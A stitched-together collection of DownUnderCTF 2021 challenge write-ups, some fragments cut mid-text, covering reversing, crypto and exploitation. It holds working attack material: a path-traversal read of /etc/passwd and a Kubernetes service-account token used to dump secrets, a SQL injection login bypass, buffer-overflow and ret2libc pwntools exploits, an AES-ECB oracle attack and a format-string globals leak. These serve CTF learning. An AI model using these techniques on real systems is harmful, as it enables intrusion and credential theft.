> Process takes about 1-2 minutes, which is way faster than writing a script. Watch the video [here](https://www.youtube.com/watch?v=MzBfIV-mJwU).
> This method is inspired by a similar challenge I did during BCACTF2.0 - [Infinite Zip](https://github.com/Rookie441/CTF/blob/main/Storage/Writeups/BCACTF2.0_Writeup.md#infinite-zip).
> My solution won the "Best Write Up with an Unintended Solution" prize money of AUD$50. [twitter link](https://twitter.com/DownUnderCTF/status/1452544420448858119).
`DUCTF{babushkas_v0dka_was_h3r3}` |
After reversing the binary with Ghidra, the general gist of what it does is the following:
Given a list of numbers, it checks if all numbers from 0 through 14 are present. If so, and the last number is 0, then it computes the costs of traveling between adjacent entries in the list, starting from 0. Specifically, it calculates the cost of 0 -> first element, first element -> second element, etc. If the sum of these costs is at most 2192, then the flag is printed. The costs are presented in an array indexed by these pairs of elements.
After extracting the array, the problem reduces to solving the Traveling Salesman Problem, with an added twist: we're allowed to repeat vertices to possibly lower the cost. So, the game plan is as follows: first, run an APSP algorithm such as Floyd-Warshall on the graph of distances between vertices to generate a new graph containing the minimal distances between vertices. Then, solve TSP on this new graph to get an optimal solution.
Here is the code for calculating APSP, where the `dist` dictionary stores the minimal distances.
```import numpy as npimport networkx as nx
# darr is array of (source, dest) -> costG = nx.from_numpy_matrix(np.array(darr), create_using=nx.DiGraph)
pred, dist = nx.floyd_warshall_predecessor_and_distance(G)```
Then, we wrote our own code for TSP (for some reason, online code wasn't giving the right results)
```from functools import combinations
def tsp(dists): memo = defaultdict(int) # visited set -> (min cost, last visited in set) n = len(dists)
for i in range(n): memo[frozenset([i])] = (0, i)
for size in range(2, n + 1): for comb in combinations(dists.keys(), size): mn = 100000000000000 argmin = -1 for e in comb: cc = frozenset(set(comb).difference(set([e]))) cost, last = memo[cc] if cost + dists[last][e] < mn: mn = cost + dists[last][e] argmin = e memo[frozenset(comb)] = (mn, argmin) currset = set([i for i in range(14)]) path = [] while len(currset) > 0: finc, finl = memo[frozenset(currset)] path.append(finl) currset = currset.difference(set([finl]))
return memo, path[::-1]```
It turns out the minimum cost was 2161, which is within bounds! Now, all that remains is to discover what changed when we ran shortest paths, and this is what the `pred` dictionary is for: it stores predecessors in shortest paths.
```def discover(x, y): path = [y] while y != x: y = pred[x][y] path.append(y) return path[::-1]```
Now, we can take the path from `tsp` and run it through `discover` to find our final answer and the flag:
`python3 -c 'for r in [6,11,14,7,8,1,5,10,3,12,4,9,7,2,13,0]: print(r)' | nc 147.182.172.217 42000`
gives
```i like this touri guess i'll give you the flag nowflag{r3v_a1g0_cl0s3_3n0ugh_3293011594}``` |
Upon connecting to the website at http://whale-blog.duc.tf:30000/ we can discover some interesting functionality:
* The page links in the bottom redirect us to ?page=filename (Probably a local file disclosure/include vulnerability)* The page mentions whale-endpoint.duc.tf (Which is a valid website located at https://whale-endpoint.duc.tf/)
So firstly we investigate if we can trigger a LFI and lo and behold the url (http://whale-blog.duc.tf:30000/?page=../../../../etc/passwd) produces (at the top of the page):
```text
```
So we know that this a way to read files on disk.
Next up we visit https://whale-endpoint.duc.tf/ and find an interesting message:
```json{ "kind": "Status", "apiVersion": "v1", "metadata": { }, "status": "Failure", "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"", "reason": "Forbidden", "details": { }, "code": 403}```
Some quick googling will reveal that this a kubernetes API server (probably the one used to host whale blog.
If we assume that the docker container running whale blog is actually a POD inside a kubernetes cluster, then we can try to see if kubernetes stores any useful files inside a POD. After some research we find that AutomountServiceAccountToken is enabled by default and leaves a valid kubernetes access token on disk at `/var/run/secrets/kubernetes.io/serviceaccount/token`, so let's get it:
http://whale-blog.duc.tf:30000/?page=../../../../var/run/secrets/kubernetes.io/serviceaccount/token produces:
```texteyJhbGciOiJSUzI1NiIsImtpZCI6Il9aWTAzOVpGRXVLVUJMdngzbDJ2b1ZnRV9QOXVHTHI2WC1QeVBzWGp1eGMifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tZ3RqYjciLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjY4OTllYzliLWQyNGMtNDNlMS1hNzFiLWZlZjAzOWRkY2RkZiIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.VbWj-lRsEhste-RvsjFaYM_ndXXVK1AzyIlcuuNoc1Q5DZmKJZDQdLVCLIJSKQR5vCByACDPRGTLGeJTyVr3Abx_Oa_t2Pkov62BExBq-HSk8Y-HZYDicKG5bSrdMT2UkvSONttX-u-5q0mtrNPpWkIoFDRg0g-bX_h6ggme4ZcMT9ccyH_LUeaM9l_0DG5bYFWMUd1smCom1M7kTzz8rEllL7VfS1-FJ_9s7MuHQ280nSFqH90iAu7UQcrMhxsP-96d9sI-Tkqwkw-gL3orovdiLXbed_VPdp-D5HE14Olr5ZM_rSsl4ki56y1VXJbOzC1rK9Qrm3qLxk4Njs3SMw```
I saved this token to a file aptly named `token`.
Now we just have to configure kubectl to talk to this remote API server and use our token:
```bash$ kubectl config set-cluster ductf --server=https://whale-endpoint.duc.tf/
$ kubectl get pods --token=$(cat token)```
This unfortunately gives us some certificate errors, but we'll just ignore them:
```bash$ kubectl --insecure-skip-tls-verify --token=$(cat token) -n default auth can-i list secretsyes
$ kubectl --insecure-skip-tls-verify --token=$(cat token) -n default get secretsNAME TYPE DATA AGEdefault-token-gtjb7 kubernetes.io/service-account-token 3 4d2hnooooo-dont-read-me Opaque 1 4d2h
$ kubectl --insecure-skip-tls-verify --token=$(cat token) -n default get secret nooooo-dont-read-me -o jsonpath="{.data}"{"so-secret-though":"RFVDVEZ7ZzAwbmllc19nb3RfdGgxc19sNHN0X3llYXJfbm93X3VfZGlkIX0K"}```
Decoding this string reveals the flag: `DUCTF{g00nies_got_th1s_l4st_year_now_u_did!}` which is in reference to the goonies pulling off a similar attack (with less impact) last year against the CTF infrastructure.
|
___# outBackdoor_(pwn, easy, 100 points, 361 solves)_
Fool me once, shame on you. Fool me twice, shame on me.
Author: xXl33t_h@x0rXx
`nc pwn-2021.duc.tf 31921`
[outBackdoor](./outBackdoor)___
## Investigation`checksec` showed that besides NX no other stack mitigations are present, especially no PIE. Following the `ltrace` I learned the relatively simple flow of the program and founda potential buffer overflow vulnerability because the insecure `gets` functions is used to capture user input. I loaded the program into `gdb` and found - nextto the `main` function - another interesting function called `outBackdoor`.
```(gdb) info functions...0x0000000000401195 main0x00000000004011d7 outBackdoor...```
```(gdb) disas outBackdoor...0x00000000004011e7 <+16>: lea rdi,[rip+0xedf] # 0x4020cd "/bin/sh"0x00000000004011ee <+23>: mov eax,0x00x00000000004011f3 <+28>: call 0x401050 <system@plt>...```
```(gdb) disas main...0x00000000004011bf <+42>: lea rax,[rbp-0x10]0x00000000004011c3 <+46>: mov rdi,rax0x00000000004011c6 <+49>: mov eax,0x00x00000000004011cb <+54>: call 0x401060 <gets@plt>...```
The disassembly of the functions reveals we can get a shell from `outBackdoor` - if we are able to call it, as it isn't called from anywhere in `main`.So the goal is to overflow the buffer in the `main` function and overwrite the return address with the address of the `outBackdoor` function. Let's seta breakpoint right after the `gets` and run the program with `AAAAAAAA` as input.
```(gdb) r...Breakpoint 1, 0x00000000004011d0 in main ()(gdb) info frameStack level 0, frame at 0x7fffffffdee0: rip = 0x4011d0 in main; saved rip = 0x7ffff7e0cb75 Arglist at 0x7fffffffded0, args: Locals at 0x7fffffffded0, Previous frame's sp is 0x7fffffffdee0 Saved registers: rbp at 0x7fffffffded0, rip at 0x7fffffffded8(gdb) x/10x $rbp-0x100x7fffffffdec0: 0x41414141 0x41414141 0x00000000 0x000000000x7fffffffded0: 0x00000000 0x00000000 0xf7e0cb75 0x00007fff0x7fffffffdee0: 0xffffdfc8 0x00007fff```
We see that the buffer at `rbp-0x10` which is at `0x7fffffffdec0` itself takes 16 bytes of which we filled 8 bytes with the `AAAAAAAA`'s we typed in.Then follows the `rbp` at `0x7fffffffded0`. On a 64-bit system this address takes another 8 bytes and directly after follows the `main` function's returnaddress we want to overwrite with the address of `outBackdoor` which is `0x00000000004011d7` - lucky for us the binary isn't PIE enabled.
So we can just- fill the buffer at `rbp-0x10` with 16 bytes- overwrite `rbp` with 8 bytes- overwrite the return address of `main` with `0x00000000004011d7` making `rip` point to `outBackdoor`.
## SolutionLet's pull off a quick ruby exploit for proof of concept.
```(gdb) r < <(ruby -e 'print "A"*16 + "B"*8 + "\xd7\x11\x40\x00\x00\x00\x00\x00"')...Breakpoint 1, 0x00000000004011d0 in main ()(gdb) x/10x $rbp-0x100x7fffffffdec0: 0x41414141 0x41414141 0x41414141 0x414141410x7fffffffded0: 0x42424242 0x42424242 0x004011d7 0x000000000x7fffffffdee0: 0xffffdf00 0x00007fff(gdb) cContinuing.
W...w...Wait? Who put this backdoor out back here?```___##### NoteWhen running the exploit remotely the program segfaults because of the so called [movaps issue](https://ropemporium.com/guide.html).`movaps` is an assembly instruction that is used in some syscalls like `do_system()` and it expects the stack to be 16-byte aligned. Because we just brutally overwrote the return address of `main` instead of using a clean `call outBackdoor` our stack at the point of calling into `system()` is not aligned correctly.To deal with that I used the address of `outBackdoor + 1` in the exploit instead - skipping the first `push rbp` instruction and therefore keeping the stack alignment intact.___
See [exploit](./exploit.py) for an automation of the exploit written in python.
> DUCTF{https://www.youtube.com/watch?v=XfR9iY5y94s} |
# Cowboy World

# VulnerabilityHonestly, i didn't really know what type of vulnerability until now even i solved it. ?

# Solution
I am just playing around the website And i found (/robots.txt) that leads to another web path called (/sad.eml)

When I go to it, i got (.eml) email file

I looked into the email file.
I knew the email is send to [email protected]. And i noticed the letters in the line of 18,
said that "thats why a 'sadcowboy' is only allowed to go into our website".
So i knew that username is sadcowboy.
But i can't find the password, so i just testing some default passwords and i got one idea that why i don't try sql injection in password field.
So I used (sadcowboy) for username and for password i used (' or 1=1 --).

Well, you can tell that i am lucky because in my first try with sql injection, It worked! Perfect!

I really like this challenge. Thanks to all of CTF-organizers.
# Thanks For reading! |
# Checker

files: [checker.py](checker.py)
1) reading the .py file
- 
2) so the goal is to just do all the functions in reverse. Some of the functions you have to modify a bit (such as the bitshift in "up"). i left my scratch work in [checkertester](checkertester.py), but this one can all be done with a trial and error with prints even if your python skills aren't strong.
3) one by one i went through the functions backwards and annotated what they did and made a new python file that does the opposite [checkersolver.py](checkersolver.py)
4)  |
# Description`So much of crypto is all about shapes! Since some shapes have so many special sides :)`
# AnalysisA shape with 6 faces like a square.```n=0x9ffa2a58ad286990fc5fe97b669e8cb2752e81fafa5ac774ea856d8ca124089ba4b06fe21a5d588c1dcb9602838d32cd70e50b85dec21fa79944543176c7a3b8b804ab754af2978f23b09f2905103dd5a4c748df8d9e9a079a5b38f6f69051b3c6582ebc2d2d199b3a97cb7e58af79b90fe08884626d188e194816bd51960a45e = 0x3 c=0x10652cdfaa6a6f6f688b98219cd32ce42c4d4df94afaea31cd94dfac50678b1f50f3ab1fd389f9998b6727ffd1a2c06ee6bde21ae85daef63fd0fa694a93f3674dc3f9ea0f2e3283a3d9897137aea12458aa3b8f96c61f3bf74a510bab7e7d8b7af52290d2621f1e06e52e6a7be4896c6465
```My initial thought when reading the provided text file is that e is an exponent, c is cipher text and n is the modulus for RSA due to convention. I attempted to [factor](https://www.alpertron.com.ar/ECM.HTM) the modulus but decided it was not fruitful as a teammate sent an article explaining the attack. The [attack](https://www.johndcook.com/blog/2019/03/06/rsa-exponent-3/) essentially utilizes the tiny exponent used which allows the attacker to take the cube root of the encrypted message. [gmpy2](https://gmpy2.readthedocs.io/en/latest/overview.html) was used to avoid any rounding issues. I then used cyber-chef to convert the hex string to the corresponding ASCII string.```flag{080eaeb0d8f724bcb542562b3bb708e5}```
![[email protected]](images/[email protected])
|
This is an AES ECB challenge.
Which means that for tow identical block the two ciphered block will be the same.
The string shape that will be ciphered is retrieved from the source code:
`Flag + input + key +padding`
Now the key can be recovered.
To do that, the size of a cipher block must be find:
This is easy: 16 (it was written in the source code)
Now the size of a possible offset must be found, because the input data must be placed in a new block:
With some manually down test, the size of the flag part was estimated to be at least 2 block. That is down by the input of random data and checking the untouched part.To do that a function is created it take as argument the connection socket:
```python
blocksize = 16flagBloksCount = 2flagSize = blocksize*flagBloksCount
def findOffset (s ):
OffsetChar = '_' offsetLen = 0 offsetStr = "" data = 'A'*blocksize*2; while offsetLen < blocksize:
offsetStr = OffsetChar*offsetLen s.send((offsetStr+data+"\n").encode()) Rdata = s.recv(1024) Rdatat = Rdata.decode().split('\n') rd = b64decode(Rdatat[0]) if (rd[flagBloksCount*blocksize] == rd[(flagBloksCount+1)*blocksize] ): print(f"offset fond : {offsetLen}") return offsetLen offsetLen += 1 pass print("offset error") exit(1)```
Here there is no offset
From that point one letter can be recover by filling the input with $blocksize -1$ characters and get the cipher value of that block through the oracle. Then tests are made to find which character from the key was put inside the block. To do the test the oracle is input with $blocksize -1$ characters plus the character to test and the resulting block is compared to initial block.
To get the full key the operation is repeated until the key is found.
But after a certain amount of try we are kick out, so a reconnection system is implemented
After the key is recovered the flag and the key are decoded:
`DUCTF{ECB_M0DE_K3YP4D_D474_L34k}!_SECRETSOURCE_!`
the key : `!_SECRETSOURCE_!`
the flag : `DUCTF{ECB_M0DE_K3YP4D_D474_L34k}`
The full code :
```python#!/usr/bin/python3import sysimport osfrom Crypto.Cipher import AESfrom base64 import b64decodeimport socketimport time
flagSize = 32
blocksize = 16
flagBloksCount = 2
# reconnection socketclass tcpSocket: """docstring for mSocket""" def __init__(self): self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.a = 0
def connect(self, host, port): self.host = host self.port = port self.s.connect((self.host, self.port))
def reconect(self,st =""): print("recon"+st) self.s.close() time.sleep(5) self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.s.connect((self.host, self.port)) self.s.recv(1024)
def send(self, data): try: if(self.a > 128): self.reconect(" wanted") self.a = 0 self.s.send(data) self.a +=1 time.sleep(0.25) except: print (self.a) self.reconect(" error") self.a = 0 self.send(data)
def recv(self, size): d = self.s.recv(size) if len(d) == 0: print (self.a) return d
def close(self): self.s.close()
# function to find eventual offsetdef findOffset (s ):
OffsetChar = '_' offsetLen = 0 offsetStr = "" data = 'A'*blocksize*2; while offsetLen < 52:
offsetStr = OffsetChar*offsetLen s.send((offsetStr+data+"\n").encode()) Rdata = s.recv(1024) Rdatat = Rdata.decode().split('\n') rd = b64decode(Rdatat[0]) if (rd[flagBloksCount*blocksize] == rd[(flagBloksCount+1)*blocksize] ): print(f"offset fond : {offsetLen}") return offsetLen offsetLen += 1 pass print("offset error") exit(1)
# define an simple oracle functiondef oracle(s,data): s.send((data+"\n").encode()) Rdata = s.recv(1024) Rdatat = Rdata.decode().split('\n') rd = b64decode(Rdatat[0]) return rd
def printByte(b, g=16): out = "" i = 0 m = len(b) while i < m: out += b[i:i+g].hex() out += " " i+=g print(out)
# function to find a single character def solvLetter(s, offsetLen, found, bp, bm): offset = 'B'*offsetLen static = '~'*(blocksize-len(found)-1) d = oracle(s,offset+static) target = d[bp:bm] for i in range(33,128): val = (offset+static+found+chr(i)) #print(val) ct = oracle(s, val) if (ct[bp:bm] == target): print(f"found : {chr(i)} => {i}") print(f"{found}{chr(i)}") return chr(i) return None
#function to find the key (use solvLetter)def solvKey(s): offsetLen = findOffset(s) found = "" bp = flagBloksCount*blocksize bm = (flagBloksCount+1)*blocksize for i in range(0,16): found += solvLetter(s,offsetLen,found,bp,bm) print(f"key : \"{found}\", length = {len(found)}") return found
def main(): s = tcpSocket() s.connect("pwn-2021.duc.tf", 31914) print(s.recv(1024)) key = solvKey(s).encode()
# decoding flag data = oracle(s,"") printByte(data) cipher = AES.new(key, AES.MODE_ECB) pt = cipher.decrypt(data) print(pt) s.close() exit(0)
if __name__ == "__main__": main()``` |
# ready, bounce, pwn!

Check the file

Let reverse it

This is the main function, program call `read()` to get input to buffer, and than call `read_long`

`Read_long` function call read to buf and them call atol
If you only look to the psuedo code, it just a normal program, no bug. But when I see in the assembly code, I found one thing.

After call read_long, program call instruction add rbp, rax with rax is the return of atol.
Let look to the stack and see what we can do?

The red border is the stack we can control de value on it, the first is fread() in read_long, the second is the fread() in main. Rbp pointer in main now is 0x7fffffffdeb0.
Author give me the libc, so it might be useful for ret2libc. The chall is look simply easy, because no PIE, we can use the puts_plt to leak the address of libc. We only control 3 continues block. But the pop_rdi, address, puts, return will need 4 block.
We can not use payload pop_rdi,address, return to return to the main and use the printf function to leak libc because we will lost the rbp control.

For example, if you want to puts 3 block payload in 0x7fffffffde90, 0x7fffffffde98, 0x7fffffffdea0, you need to add the rbp to reach 0x7fffffffde88, and will pop rbp = 0x40123e

Actually, this way can still be successful because the rbp pop value at 0x7fffffffde88 is the return address to main, is a fixed address, and we can still add rbp to return the correct payload next time. However, the server system running the challenge is ubuntu 64 bit, it requires before calling printf rsp % 0xff = 0 (align in 16 byte padding). So if we do like above, the rsp when we call printf is 0x7fffffffdea8 not align, so the program will catch segment fault.
So because of that, we will need a 4 block payload for the program to not have segment fault.
My solution is recall the function main in the payload to get 4 block payload control.

Look at the stack, what happen ip we push the `main` address at 0x7fffffffde70 and add the rbp to reach 0x7fffffffde68?

When the program call leave, ret, the rbp will be set to = 0x00000a3131313131
And the the rsp now is 0x7fffffffde78 (not allign), but after we ret to the main function, we have two instruction `push rbp` and `mov rbp, rsp`

So after the push instruction rsp now is 0x7fffffffde80 (allign) and the rbp will now equals 0x7fffffffde80 too. The different between call and ret, that is call will push the return address to the stack (so the stack will push 2 times), and ret is trush push 1 time.
So now we are in main and look at the red and green block in image, you see what special? The red block is the second block of 3 previous `read_long()` block. And it is the block we can put in what ever we want on it (block 3 need to put main address, and block 1 need to push a string to add to rbp).
So now we have 4 block payload (3 block in `main()` and 1 last block in previous `read_long()`), we can use the payload pop_rdi, address, puts, ret to leak the libc and return to main to reuse the vulnerabilities again.
Note that the ret we use in 4 block payload is main address, but after the `push rbp` instruction, because we will need the instruction `mov rbp, rsp` (to restore rbp), but the `push rbp` will make the rsp not allign.

Yah now we comback to function again, but now we already have libc leak, so we just have to put the payload pop_rdi, /bin/sh, system and add the rbp to get shell.
## Final exploit - First, input payload offset, main_after_push, main by read in `read_long()`, main address only need last 3 byte so we can easily put in
- Second, now program return to main function, we puts 3 block of payload pop_rdi, got_address, puts to cocat with last block main_after_push to leak libc and return to main again.
- Third, use libc leak to calculate the address of system, /bin/sh and get the shell
Note that the third payload only need 3 block and no get segment fault. Why? It really easy, just think about it :v. I already mentioned above :v
File [solve.py](/2021/DownUnderCTF2021/ready,bounce,pwn!/solve.py)
```pythonfrom pwn import *#s = process('./rbp')s = remote('pwn-2021.duc.tf', 31910)#raw_input('DEBUG')pop_rdi = 0x00000000004012b3ret = 0x000000000040101aputs_got = 0x0000000000404018puts_plt = 0x0000000000401030puts_offset = 0x809d0system_offset = 0x04fa60bin_sh_offset = 0x1abf05main = 0x00000000004011d5main_not_push = 0x00000000004011d6s.sendafter(b'name? ', b'Cobra')s.sendafter(b'number? ', b'-72\x00\x00\x00\x00\x00' + p64(main_not_push) + p64(main)[:3])payload = p64(pop_rdi) + p64(puts_got) + p64(puts_plt)s.sendafter(b'name? ', payload)s.sendafter(b'number? ', b'-40\x00\x00\x00\x00\x00')puts_leak = int.from_bytes(s.recv(6).strip(), byteorder = 'little', signed = False)libc_base = puts_leak - puts_offsetsystem = libc_base + system_offsetbin_sh = libc_base + bin_sh_offsetpayload = p64(pop_rdi) + p64(bin_sh) + p64(system)s.sendafter(b'name? ', payload)s.sendafter(b'number? ', b'-40\x00\x00\x00\x00\x00')s.interactive()```

`flag: DUCTF{n0_0verfl0w?_n0_pr0bl3m!}` |
# **DownUnderCTF 2021**
<div align="center"> </div>
***
# Table of Contents* [Miscellaneous](#miscellaneous) * [Discord](#discord) * [The Introduction](#the-introduction) * [Twitter](#twitter) * [General Skills Quiz](#general-skills-quiz) * [rabbit](#rabbit) * [Floormat](#floormat)* [Cryptography](#cryptography) * [Substitution Cipher I](#substitution-cipher-i) * [Substitution Cipher II](#substitution-cipher-ii) * [Break Me!](#break-me) * [treasure](#treasure)* [Reversing](#reversing) * [no strings](#no-strings)***
# Miscellaneous
## DiscordHow about you visit our help page? You know what they say when you need 'help' discord is there for support :)
**Author:** Crem
**Solution**
The flag is in the `#request-support` channel on the [CTF discord channel](https://discord.gg/vXtuGXy)
**Flag**
**`DUCTF{if_you_are_having_challenge_issues_come_here_pls}`**
## The IntroductionAre you ready to start your journey?
**Author:** Crem
`nc pwn-2021.duc.tf 31906`
**Solution**
With the challenge we're given a command to run, this command (`nc`) connects to a server identified with the domain pwn-2021.duc.tf and interacts with a service running on port `31906`, running it returns the following question from the server:
```wh47 15 y0ur n4m3 h4ck3r?```
Entering a name will starts printing the hacker manifesto, this is an essay written in the 80s by "The Mentor" after his arrest and is considered a major piece of the hacker culture, the full essay is linked below and worth a read if you consider yourself part of the hacking community.
After printing the essay, the following line is written:```50 4r3 y0u 4c7u4lly 4 h4ck3r?```Answering yes will return you the flag (other answers might also work as I didn't check):
```W3rni0, y0u w1ll n33d 7h15 0n y0ur duc7f j0urn3y 7h3n
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DUCTF{w3lc0m3_70_7h3_duc7f_7hund3rd0m3_h4ck3r}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
__ / \--..____ \ \ \-----,,,.. \ \ \ \--,,.. \ \ \ \ ,' \ \ \ \ ``.. \ \ \ \-'' \ \ \__,,--''' \ \ \. \ \ ,/ \ \__..- \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \```
**Flag** **`DUCTF{w3lc0m3_70_7h3_duc7f_7hund3rd0m3_h4ck3r}`**
**Refereces**
* [The Hacker Manifesto](http://phrack.org/issues/7/3.html)
## TwitterIf you have been paying attention to our Twitter, we have been using flags in the background of our graphics this year. However, one of these flags stands out a bit more than the rest! Can you find it?
While you're there, why don't you give us a follow to keep up to date with DownUnderCTF!
**Author:** Crem
**Solution**
This one is pretty guessy but the solution is written in the description so I guess I can't complain, this year the CTF graphics used flags from the previous competition, as can be seen here:
<div align="center"> </div>
But one of the graphics posted two weeks before the competition included the flag in a brighter color, try finding it in the image:
<div align="center"> </div>
(hint - look down)
**Flag**
**`DUCTF{EYES_ON_THE_PRIZES}`**
## General Skills QuizQUIZ TIME! Just answer the questions. Pretty easy right?
**Author:** Crem
`nc pwn-2021.duc.tf 31905`
**Solution**
This challenge requires you to decode and encode using different popular formats such as base64, binary and ROT13. Not enough time is given to do those manually, so I ended up writing the following python script that interacts with the server and performs the conversions (the tasks required are commented):```pythonfrom pwn import *from urllib.parse import unquotefrom base64 import b64decode, b64encodefrom codecs import encode,decode
s = remote('pwn-2021.duc.tf', 31905)
# Ready to starts.sendline()# 1+1=?s.recvuntil(': ')s.sendline('2')# Decode an hex string to decimals.recvuntil(': ')s.sendline(str(int(s.recvline(),16)))# Decode an hex string to ASCII letters.recvuntil(': ')s.sendline(str(chr(int(s.recvline(),16))))# Decode a URL encoded strings.recvuntil(': ')s.sendline(unquote(s.recvline(keepends=False).decode()))# Base64 decodes.recvuntil(': ')s.sendline(b64decode(s.recvline()))# Base64 encodes.recvuntil(': ')s.sendline(b64encode(s.recvline(keepends=False)))# ROT13 decodes.recvuntil(': ')s.sendline(decode(s.recvline(keepends=False).decode(), 'rot_13'))# ROT13 encodes.recvuntil(': ')s.sendline(encode(s.recvline(keepends=False).decode(), 'rot_13'))# Binary decodes.recvuntil(': ')s.sendline(str(int(s.recvline(),2)))# Binary encodes.recvuntil(': ')s.sendline(bin(int(s.recvline())))# Best CTF competitions.recvuntil('?')# s.sendline('picoCTF')s.sendline('DUCTF')s.interactive()```I'll add a description for each encoding used later on, after doing all those tasks we're given the flag:```Bloody Ripper! Here is the grand prize!
.^. (( )) |#|_______________________________ |#||##############################| |#||##############################| |#||##############################| |#||##############################| |#||########DOWNUNDERCTF##########| |#||########(DUCTF 2021)##########| |#||##############################| |#||##############################| |#||##############################| |#||##############################| |#|'------------------------------' |#| |#| |#| |#| |#| |#| |#| |#| |#| |#| |#| |#| DUCTF{you_aced_the_quiz!_have_a_gold_star_champion} |#| |#| |#| //|\\```**Flag**
**`DUCTF{you_aced_the_quiz!_have_a_gold_star_champion}`**
## rabbitCan you find Babushka's missing vodka? It's buried pretty deep, like 1000 steps, deep.
**Author:** Crem + z3kxTa
[flag.txt](challenges//flag.txt)
**Solution**
This type of challenge is really common and I've covered a variation of it before in [my writeup for TJCTF 2020](https://github.com/W3rni0/TJCTF_2020#zipped-up).
With the challenge we're given a file falsely named `flag.txt`, this file is actually a compressed file of either `bzip2`, `zip`, `gzip` or `xz` format. And, as the description for the challenge suggests, it contains another compressed file of the same type and so on. decompressing each file manually is possible but will require a lot of work, so we can automate the process by scripting.
For that I wrote the following bash script that for each file in the working directory checks its type, and if it of one of the above compression file formats, the script extract the content of the file and removes it. This process terminates only when there aren't any compressed files in the directory:
```bash#!/bin/bashget_flag() { for filename in $(pwd)/*; do echo "$filename" if [[ $(file --mime-type -b "$filename") == "application/x-bzip2" ]] then bunzip2 "$filename" rm "$filename" get_flag return elif [[ $(file --mime-type -b "$filename") == "application/zip" ]] then mv $filename flag.zip unzip flag.zip rm flag.zip get_flag return elif [[ $(file --mime-type -b "$filename") == "application/x-xz" ]] then mv $filename flag.xz unxz -f flag.xz rm flag.xz get_flag return elif [[ $(file --mime-type -b "$filename") == "application/gzip" ]] then mv $filename flag.gz gunzip flag.gz rm flag.gz get_flag return else cat "$filename" return fi done}
get_flag```
And by letting the script run for a while I got a text file containing the following string:```RFVDVEZ7YmFidXNoa2FzX3YwZGthX3dhc19oM3IzfQ==```I inferred by the symbols in the string that this is a base64 encoded message, and decoding it from base64 using [CyberChef](https://gchq.github.io/CyberChef/) I got the flag:
<div align="center"> </div>
**Flag**
**`DUCTF{babushkas_v0dka_was_h3r3}`**
## FloormatI've opened a new store that provides free furnishings and floormats. If you know the secret format we might also be able to give you flags...
**Author:** todo#7331
`nc pwn-2021.duc.tf 31903`
[floormat.py](challenges//floormat.py)
**Solution**
The function str.format() is used to replace a string we control with an object, which gives us access to object's attributes, one of them is a dictionary of global variables in the init of the object, which contains the flag:```pythonfrom pwn import *
s = remote('pwn-2021.duc.tf', 31903)# Ask for a custom formats.sendline("my l33t format")# Send Payloads.sendline("{f.__init__.__globals__[FLAG]}")s.sendline("F")# Ask for one of the furnishing (not important which)s.sendline("flutter")s.interactive()```**Flag**
**`DUCTF{fenomenal_flags_from_funky_formats_ffffff}`**
***
# Cryptography
## Substitution Cipher IJust a simple substitution cipher to get started...
**Author:** joseph#8210
[substitution-cipher-i.sage](challenges//substitution-cipher-i.sage) | [output.txt](challenges//output_i.txt)
**Solution**
The encryption is known and works letter by letter, thus we can find the encryption of each letter and use that to inverse the ciphertext:```pythonfrom string import printable
def encrypt(msg, f): return [chr(f.substitute(c)) for c in msg]
def decrypt(enc, f): subtitution_table = encrypt(printable.encode('utf-8'), f) return ''.join(printable[subtitution_table.index(c)] for c in enc)
P.<x> = PolynomialRing(ZZ)f = 13*x^2 + 3*x + 7
enc = open('./output.txt', 'r').read().strip()FLAG = decrypt(enc, f)print(FLAG)```**Flag**
**`DUCTF{sh0uld'v3_us3d_r0t_13}`**
## Substitution Cipher IIThat's an interesting looking substitution cipher...
**Author:** joseph#8210
[substitution-cipher-ii.sage](challenges//substitution-cipher-ii.sage) | [output.txt](challenges//output_ii.txt)
**Solution**
Similar to the previous challenge, only difference is that we need to find the polynomial now, we can do that by knowing that the flag starts with '`DUCTF{`' and ends with '`}`', and use lagrange interpolation to find the polynomial:
```pythonfrom string import ascii_lowercase, digits, printableCHARSET = "DUCTF{}_!?'" + ascii_lowercase + digitsn = len(CHARSET)
def encrypt(msg, f): ct = '' for c in msg: ct += CHARSET[f.substitute(CHARSET.index(c))] return ct
def decrypt(enc, f): subtitution_table = encrypt(CHARSET, f) return ''.join(CHARSET[subtitution_table.index(c)] for c in enc)
P.<x> = PolynomialRing(GF(n))enc = open('./output.txt', 'r').read().strip()
X = [0, 1, 2, 3, 4, 5, 6]Y = [CHARSET.index(c) for c in enc[:6]] + [CHARSET.index(enc[-1])]points = zip(X,Y)f = P.lagrange_polynomial(points)
FLAG = decrypt(enc,f)print(FLAG)```**Flag**
**`DUCTF{go0d_0l'_l4gr4fg3}`**
## Break Me!AES encryption challenge.
**Author:** 2keebs
`nc pwn-2021.duc.tf 31914`
[aes-ecb.py](challenges//aes-ecb.py)
**Solution**
AES-ECB one byte at a time attack, I covered it before in my writeup for [H@cktivityCon CTF 2020](https://github.com/W3rni0/HacktivityCon_CTF_2020#a-e-s-t-h-e-t-i-c):
```pythonfrom pwn import *import refrom string import printablefrom Crypto.Cipher import AESfrom base64 import b64decode
# Part 1 - Retrieving the keys = remote('pwn-2021.duc.tf', 31914)s.recvuntil(":")key = '' # !_SECRETSOURCE_!
